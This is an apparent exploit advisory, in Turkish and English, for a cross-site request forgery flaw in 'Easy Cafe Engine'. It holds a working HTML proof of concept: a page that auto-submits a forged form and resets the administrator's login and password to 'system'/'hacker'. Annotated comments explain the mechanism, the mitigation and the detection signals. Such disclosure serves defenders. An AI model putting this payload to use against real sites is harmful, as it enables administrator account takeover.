< ------------------- header data start ------------------- >

#############################################################

# Application Name : Easy Cafe Engine

# Vulnerable Type : XSRF (Cross-Site Request Forgery)

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form'a Oturum Key'i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<!-- CSRF proof of concept: the page auto-submits the form below as soon as it loads,
     so an administrator who is logged in and merely visits this page sends a
     password-change request with their own session cookie attached by the browser. -->
<bOdy onload=Submit();>
<!-- Submit() posts the form named "frm" with no user interaction. -->
<script>function Submit(){document.frm.submit();}</script>
<!-- Cross-origin multipart POST to the password section of admin.php. The request
     carries no per-session anti-CSRF token and no current-password field, which is
     why the server cannot distinguish this forged request from a legitimate one.
     Note: the ’ characters are not HTML quote delimiters, so as written they become
     part of the attribute values. -->
<form name=frm action=’http://easy.cafeengine.com/admin.php?section=password’ method=POST enctype=multipart/form-data>
<!-- Server-side action selector sent with the request. -->
<input type=hidden name=action value=update_options>
<!-- The <td> cells have no enclosing <table>; the inputs inside them are still form fields. -->
<td>Login</td>
<td><input type=text name=o[admin_login] value=system></td>
<td>password</td>
<td><input type=password name=o[admin_password] value=’hacker’></td>
<td>Confirm password</td>
<td><input type=password name=admin_password_c value=’hacker’></td>
<td colspan=2><input type=submit value=Submit></td>
</form>
<!-- Mitigation (matches the advisory's fix advice): bind the form to the session with
     a server-validated anti-CSRF token, require the current password before accepting
     a new one, and set the SameSite attribute on the session cookie. Checking the
     Origin/Referer header on state-changing requests adds a further layer; on the
     detection side, password-change POSTs with a foreign Origin/Referer or a missing
     token are the signal to alert on. -->

< -- bug code end of -- >